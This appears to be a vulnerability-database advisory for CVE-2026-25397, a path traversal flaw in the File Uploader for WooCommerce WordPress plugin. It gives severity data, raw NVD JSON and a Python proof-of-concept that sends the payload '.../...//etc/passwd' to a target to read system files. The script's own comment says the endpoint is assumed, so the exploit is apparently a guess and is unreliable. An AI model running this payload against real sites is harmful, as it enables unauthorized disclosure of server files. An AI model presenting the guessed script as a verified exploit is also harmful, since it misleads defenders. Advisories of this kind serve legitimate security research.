Security Vulnerability Report
中文
CVE-2026-25397 CVSS 7.5 HIGH

CVE-2026-25397

Published: 2026-03-25 17:16:49
Last Modified: 2026-04-28 02:16:07

Description

Path Traversal: '.../...//' vulnerability in Snowray Software File Uploader for WooCommerce file-uploader-for-woocommerce allows Path Traversal.This issue affects File Uploader for WooCommerce: from n/a through <= 1.0.4.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

File Uploader for WooCommerce <= 1.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_vulnerability(target_url): """ PoC for CVE-2026-25397 Path Traversal """ # Target endpoint might vary, assuming a common upload or file access endpoint full_url = f"{target_url}/wp-content/plugins/file-uploader-for-woocommerce/" # Payload using the specific traversal sequence mentioned payload = { "file": ".../...//etc/passwd" } try: response = requests.post(full_url, data=payload, timeout=10) if response.status_code == 200 and "root:x" in response.text: print("[+] Vulnerability confirmed! File content leaked.") return True else: print("[-] Vulnerability not detected or target patched.") return False except Exception as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": target = "http://example.com" check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25397", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:49.213", "lastModified": "2026-04-28T02:16:06.590", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Path Traversal: '.../...//' vulnerability in Snowray Software File Uploader for WooCommerce file-uploader-for-woocommerce allows Path Traversal.This issue affects File Uploader for WooCommerce: from n/a through <= 1.0.4."}, {"lang": "es", "value": "Salto de ruta: la vulnerabilidad '.../...//' en Snowray Software File Uploader for WooCommerce file-uploader-for-woocommerce permite el salto de ruta. Este problema afecta a File Uploader for WooCommerce: desde n/a hasta &lt;= 1.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-35"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/file-uploader-for-woocommerce/vulnerability/wordpress-file-uploader-for-woocommerce-plugin-1-0-4-path-traversal-vulnerability?_s_id=cve", "source": "[email protected]"}]}}